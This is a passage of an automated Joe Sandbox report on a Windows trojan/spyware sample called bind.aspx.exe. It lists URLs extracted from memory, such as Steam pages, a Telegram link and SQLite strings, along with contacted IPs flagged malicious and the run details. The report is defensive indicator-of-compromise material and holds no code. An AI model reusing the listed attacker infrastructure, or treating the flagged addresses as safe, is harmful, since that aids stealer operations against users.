                                                                                      https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgbind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drfalse
                                                                                        		unknown
                                                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://135.181.31.18/xbind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://store.steampowered.com/;bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://store.steampowered.com/about/76561199761128941[1].htm.4.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://steamcommunity.com/my/wishlist/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://help.steampowered.com/en/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://steamcommunity.com/market/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                		unknown
                                                                                                https://store.steampowered.com/news/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BKKFHI.4.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://store.steampowered.com/subscriber_agreement/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                  		unknown
                                                                                                  https://steamcommunity.com/profiles/76561199761128941/inventory/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                      		unknown
                                                                                                      https://recaptcha.net/recaptcha/;bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://steamcommunity.com/discussions/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&abind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                          		unknown
                                                                                                          https://store.steampowered.com/stats/bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://medal.tvbind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://broadcast.st.dl.eccdnx.combind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://store.steampowered.com/steam_refunds/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://t.me/iyigunlhellosqlr.dllsqlite3.dllInbind.aspx.exefalse
                                                                                                            		unknown
                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBKKFHI.4.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://steamcommunity.com/workshop/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                              		unknown
                                                                                                              https://login.steampowered.com/bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://store.steampowered.com/legal/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=ebind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.sqlite.org/copyright.html.bind.aspx.exefalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://135.181.31.18/_nbind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199761128941[1].htm.4.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoBKKFHI.4.drfalse
                                                                                                                  		unknown
                                                                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drfalse
                                                                                                                    		unknown
                                                                                                                    https://135.181.31.18/-nbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      95.164.119.162
                                                                                                                      		stadiatechnologies.comGibraltar
                                                                                                                      		39762VAKPoltavaUkraineUAtrue
                                                                                                                      104.102.49.254
                                                                                                                      		steamcommunity.comUnited States
                                                                                                                      		16625AKAMAI-ASUStrue
                                                                                                                      135.181.31.18
                                                                                                                      		unknownGermany
                                                                                                                      		24940HETZNER-ASDEtrue

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1521042
                                                                                                                      Start date and time:2024-09-28 03:28:07 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 6m 19s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:bind.aspx.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@6/17@2/3
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 99%
                                                                                                                      • Number of executed functions: 96
                                                                                                                      • Number of non-executed functions: 75
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
